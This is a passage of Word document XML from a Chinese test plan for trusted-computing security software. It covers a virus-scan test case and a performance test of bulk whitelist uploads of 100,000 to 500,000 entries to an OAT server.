                <w:color w:val="000000" w:themeColor="text1"/>
                <w:kern w:val="2"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>成功终止扫描某个主机的病毒</w:t>
            </w:r>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:cs="微软雅黑" w:hint="eastAsia"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:kern w:val="2"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="1790B22B" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7C519FE9" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>测试结果</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6833" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6270AC59" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:i/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="250FDB50" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="0020259A" w:rsidRDefault="00C55A9C" w:rsidP="00C55A9C">
      <w:pPr>
        <w:pStyle w:val="8lab-1"/>
      </w:pPr>
      <w:bookmarkStart w:id="396" w:name="_Toc36487983"/>
      <w:bookmarkStart w:id="397" w:name="_Toc36573251"/>
      <w:bookmarkStart w:id="398" w:name="_Toc36630337"/>
      <w:r w:rsidRPr="0020259A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>性能测试</w:t>
      </w:r>
      <w:bookmarkEnd w:id="249"/>
      <w:r w:rsidRPr="0020259A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>方案</w:t>
      </w:r>
      <w:bookmarkEnd w:id="250"/>
      <w:bookmarkEnd w:id="251"/>
      <w:bookmarkEnd w:id="252"/>
      <w:bookmarkEnd w:id="396"/>
      <w:bookmarkEnd w:id="397"/>
      <w:bookmarkEnd w:id="398"/>
    </w:p>
    <w:p w14:paraId="6C5D4EAC" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="00536672" w:rsidRDefault="00C55A9C" w:rsidP="00C55A9C">
      <w:pPr>
        <w:pStyle w:val="8lab-2"/>
      </w:pPr>
      <w:bookmarkStart w:id="399" w:name="_Toc227386492"/>
      <w:bookmarkStart w:id="400" w:name="_Toc223510689"/>
      <w:bookmarkStart w:id="401" w:name="_Toc227386349"/>
      <w:bookmarkStart w:id="402" w:name="_Toc224357952"/>
      <w:bookmarkStart w:id="403" w:name="_Toc36487984"/>
      <w:bookmarkStart w:id="404" w:name="_Toc36573252"/>
      <w:bookmarkStart w:id="405" w:name="_Toc36630338"/>
      <w:r w:rsidRPr="00536672">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>场景名</w:t>
      </w:r>
      <w:bookmarkEnd w:id="399"/>
      <w:bookmarkEnd w:id="400"/>
      <w:bookmarkEnd w:id="401"/>
      <w:bookmarkEnd w:id="402"/>
      <w:r w:rsidRPr="00536672">
        <w:t>称：添加白名单</w:t>
      </w:r>
      <w:bookmarkEnd w:id="403"/>
      <w:bookmarkEnd w:id="404"/>
      <w:bookmarkEnd w:id="405"/>
    </w:p>
    <w:p w14:paraId="52A008AE" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="00536672" w:rsidRDefault="00C55A9C" w:rsidP="00C55A9C">
      <w:pPr>
        <w:pStyle w:val="8lab-2"/>
      </w:pPr>
      <w:bookmarkStart w:id="406" w:name="_Toc36487985"/>
      <w:bookmarkStart w:id="407" w:name="_Toc36573253"/>
      <w:bookmarkStart w:id="408" w:name="_Toc36630339"/>
      <w:r w:rsidRPr="00536672">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>场景</w:t>
      </w:r>
      <w:r w:rsidRPr="00536672">
        <w:t>概述</w:t>
      </w:r>
      <w:bookmarkEnd w:id="406"/>
      <w:bookmarkEnd w:id="407"/>
      <w:bookmarkEnd w:id="408"/>
    </w:p>
    <w:p w14:paraId="6079E023" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00C55A9C">
      <w:pPr>
        <w:pStyle w:val="Style1"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003914A3">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>白名单的吞吐量是可信计算功能实现的主要性能瓶颈，它的快慢直接决定了，异常报警的实效性，server服务器部署的数量，以及资源的占用。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E989241" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="00536672" w:rsidRDefault="00C55A9C" w:rsidP="00C55A9C">
      <w:pPr>
        <w:pStyle w:val="8lab-2"/>
      </w:pPr>
      <w:bookmarkStart w:id="409" w:name="_Toc36487986"/>
      <w:bookmarkStart w:id="410" w:name="_Toc36573254"/>
      <w:bookmarkStart w:id="411" w:name="_Toc36630340"/>
      <w:r w:rsidRPr="00536672">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>执行策略设计</w:t>
      </w:r>
      <w:bookmarkEnd w:id="409"/>
      <w:bookmarkEnd w:id="410"/>
      <w:bookmarkEnd w:id="4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9"/>
        <w:gridCol w:w="2926"/>
        <w:gridCol w:w="2768"/>
      </w:tblGrid>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="0020259A" w14:paraId="1D906C32" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:trPr>
          <w:trHeight w:hRule="exact" w:val="473"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2579" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="BFBFBF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7E2FA4E5" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="0020259A" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:b/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0020259A">
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
                <w:b/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>性能场景</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2926" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="BFBFBF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="04D5EADE" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="0020259A" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:b/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0020259A">
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
                <w:b/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>执行策略（并发数、时长）</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2768" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="BFBFBF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1D9FFBED" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="0020259A" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:b/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0020259A">
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
                <w:b/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>备注</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="0020259A" w14:paraId="5FB7C82F" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:trPr>
          <w:trHeight w:hRule="exact" w:val="1064"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2579" w:type="dxa"/>
            <w:vMerge w:val="restart"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="48937D60" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="0020259A" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>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启动OAT服务器</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2926" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5D3DA317" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="0020259A" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:jc w:val="left"/>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一次性向OAT发送10万条白名单。</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2768" w:type="dxa"/>
            <w:vMerge w:val="restart"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="20A693AE" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="0020259A" w:rsidRDefault="00C55A9C" w:rsidP="008040BD">
            <w:pPr>
              <w:pStyle w:val="Style13"/>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hint="eastAsia"/>
                <w:iCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>得到不同并发数下系统的性能指标</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="317C4A63" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="0020259A" w:rsidRDefault="00C55A9C" w:rsidP="008040BD">
            <w:pPr>
              <w:pStyle w:val="Style13"/>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hint="eastAsia"/>
                <w:iCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>对系统的容量做出估计</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="083E7915" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="0020259A" w:rsidRDefault="00C55A9C" w:rsidP="008040BD">
            <w:pPr>
              <w:pStyle w:val="Style13"/>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hint="eastAsia"/>
                <w:iCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>列出测试的数据指标项有哪些，值在什么区间内</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="0020259A" w14:paraId="068DF9AB" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:trPr>
          <w:trHeight w:hRule="exact" w:val="1064"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2579" w:type="dxa"/>
            <w:vMerge/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="28879DB3" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="0020259A" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:iCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2926" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="75B9A1B5" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="0020259A" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>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一次性向OAT发送20万条白名单。</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2768" w:type="dxa"/>
            <w:vMerge/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6D7D9A1B" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="0020259A" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:iCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="0020259A" w14:paraId="282F68F3" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:trPr>
          <w:trHeight w:hRule="exact" w:val="1064"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2579" w:type="dxa"/>
            <w:vMerge/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0FAFD257" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="0020259A" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:iCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2926" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="67251670" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="0020259A" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>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一次性向OAT发送50万条白名单。</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2768" w:type="dxa"/>
            <w:vMerge/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="14DAC7CB" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="0020259A" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:iCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="0020259A" w14:paraId="7C455F13" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:trPr>
          <w:trHeight w:hRule="exact" w:val="1064"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2579" w:type="dxa"/>
            <w:vMerge w:val="restart"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3DDA0094" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="0020259A" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:iCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0020259A">
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:iCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>启动OAT服务器</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2926" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6F55007C" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="0020259A" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:iCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0020259A">
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:iCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>一次性发送10笔白名单，每笔1万条。</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2768" w:type="dxa"/>
            <w:vMerge w:val="restart"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2B008345"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hint="eastAsia"/>
                <w:iCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>得到不同并发数下系统的性能指标</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4DB8A909"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hint="eastAsia"/>
                <w:iCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>对系统的容量做出估计</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4039963C"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hint="eastAsia"/>
                <w:iCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>列出测试的数据指标项有哪些，值在什么区间内</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="0020259A" w14:paraId="0B6DCE6B" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:trPr>
          <w:trHeight w:hRule="exact" w:val="1064"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2579" w:type="dxa"/>
            <w:vMerge/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0C5D4F98" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="0020259A" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:iCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2926" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="72C33F13" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="0020259A" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:iCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0020259A">
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:iCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>一次性发送20笔白名单，每笔1万条。</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2768" w:type="dxa"/>
            <w:vMerge/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4757B955" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="0020259A" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="0020259A" w14:paraId="238CF134" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:trPr>
          <w:trHeight w:hRule="exact" w:val="1064"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2579" w:type="dxa"/>
            <w:vMerge/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0E949EDD" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="0020259A" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:iCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2926" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="769F3C67" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="0020259A" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:iCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0020259A">
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:iCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>一次性发送50笔白名单，每笔1万条。</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2768" w:type="dxa"/>
            <w:vMerge/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="55DD3D7E" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="0020259A" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="710E16FA" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="0020259A" w:rsidRDefault="00C55A9C" w:rsidP="00C55A9C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0020259A">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="449472C6" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="00536672" w:rsidRDefault="00C55A9C" w:rsidP="00C55A9C">
      <w:pPr>
        <w:pStyle w:val="8lab-2"/>
      </w:pPr>
      <w:bookmarkStart w:id="412" w:name="_Toc227386352"/>
      <w:bookmarkStart w:id="413" w:name="_Toc223510692"/>
      <w:bookmarkStart w:id="414" w:name="_Toc227386495"/>
      <w:bookmarkStart w:id="415" w:name="_Toc224357955"/>
      <w:bookmarkStart w:id="416" w:name="_Toc36487987"/>
      <w:bookmarkStart w:id="417" w:name="_Toc36573255"/>
      <w:bookmarkStart w:id="418" w:name="_Toc36630341"/>
      <w:r w:rsidRPr="00536672">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>测试数据需求</w:t>
      </w:r>
      <w:bookmarkEnd w:id="412"/>
      <w:bookmarkEnd w:id="413"/>
      <w:bookmarkEnd w:id="414"/>
      <w:bookmarkEnd w:id="415"/>
      <w:bookmarkEnd w:id="416"/>
      <w:bookmarkEnd w:id="417"/>
      <w:bookmarkEnd w:id="418"/>
    </w:p>
    <w:p w14:paraId="0E03FCCF" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="0020259A" w:rsidRDefault="00C55A9C" w:rsidP="00C55A9C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0020259A">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>使用脚本生成，不同IP地址的白名单，以供使用。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A0653BC" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="00536672" w:rsidRDefault="00C55A9C" w:rsidP="00C55A9C">
      <w:pPr>
        <w:pStyle w:val="8lab-2"/>
      </w:pPr>
      <w:bookmarkStart w:id="419" w:name="_Toc223510693"/>
      <w:bookmarkStart w:id="420" w:name="_Toc227386496"/>
      <w:bookmarkStart w:id="421" w:name="_Toc227386353"/>
      <w:bookmarkStart w:id="422" w:name="_Toc224357956"/>
      <w:bookmarkStart w:id="423" w:name="_Toc36487988"/>
      <w:bookmarkStart w:id="424" w:name="_Toc36573256"/>
      <w:bookmarkStart w:id="425" w:name="_Toc36630342"/>
      <w:r w:rsidRPr="00536672">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>性能测试结果分析方法和预期</w:t>
      </w:r>
      <w:bookmarkEnd w:id="419"/>
      <w:bookmarkEnd w:id="420"/>
      <w:bookmarkEnd w:id="421"/>
      <w:bookmarkEnd w:id="422"/>
      <w:bookmarkEnd w:id="423"/>
      <w:bookmarkEnd w:id="424"/>
      <w:bookmarkEnd w:id="4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3"/>
        <w:gridCol w:w="2189"/>
        <w:gridCol w:w="2051"/>
        <w:gridCol w:w="2099"/>
      </w:tblGrid>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="0020259A" w14:paraId="4F05F14A" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:trPr>
          <w:trHeight w:hRule="exact" w:val="484"/>
        </w:trPr>
